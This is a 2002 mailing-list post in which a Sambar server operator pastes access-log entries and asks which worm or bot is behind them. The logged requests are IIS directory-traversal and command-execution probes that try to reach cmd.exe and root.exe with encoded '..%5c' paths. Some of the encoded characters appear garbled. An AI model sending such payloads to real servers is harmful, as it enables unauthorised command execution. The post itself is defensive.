[sambar] Access log entries {01}

Sat, 11 May 2002 01:45:29 -0700 

Does anyone recognize what kind of virus or bot would cause the following access log 
entries?

64.65.199.33 - - [04/May/2002:00:45:06 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 
404 565 0 "-" "-"
64.65.199.33 - - [04/May/2002:00:45:07 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 
404 565 0 "-" "-"
64.65.199.33 - - [04/May/2002:00:45:08 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 565 0 "-" "-"
64.65.199.33 - - [04/May/2002:00:45:09 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 565 0 "-" "-"
64.65.199.33 - - [04/May/2002:00:45:10 -0400] "GET 
/scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
64.65.199.33 - - [04/May/2002:00:45:11 -0400] "GET 
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 
"-" "-"
64.65.199.33 - - [04/May/2002:00:45:12 -0400] "GET 
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 
"-" "-"
64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET 
/msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 565 0 "-" "-"
64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET 
/scripts/..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
64.65.199.33 - - [04/May/2002:00:45:14 -0400] "GET 
/scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
64.65.199.33 - - [04/May/2002:00:45:15 -0400] "GET 
/scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
64.65.199.33 - - [04/May/2002:00:45:16 -0400] "GET 
/scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
64.65.199.33 - - [04/May/2002:00:45:17 -0400] "GET 
/scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
64.65.199.33 - - [04/May/2002:00:45:21 -0400] "GET 
/scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
64.65.199.33 - - [04/May/2002:00:45:23 -0400] "GET 
/scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
64.65.199.33 - - [04/May/2002:00:45:25 -0400] "GET 
/scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"

I am being accessed by quite a few computers with the same or simular entries and 
would like to know the name of what this is. Thanks.

Dave Culbertson

-------------------------------------------------------
To unsubscribe please go to http://www.sambar.ch/list/

Reply via email to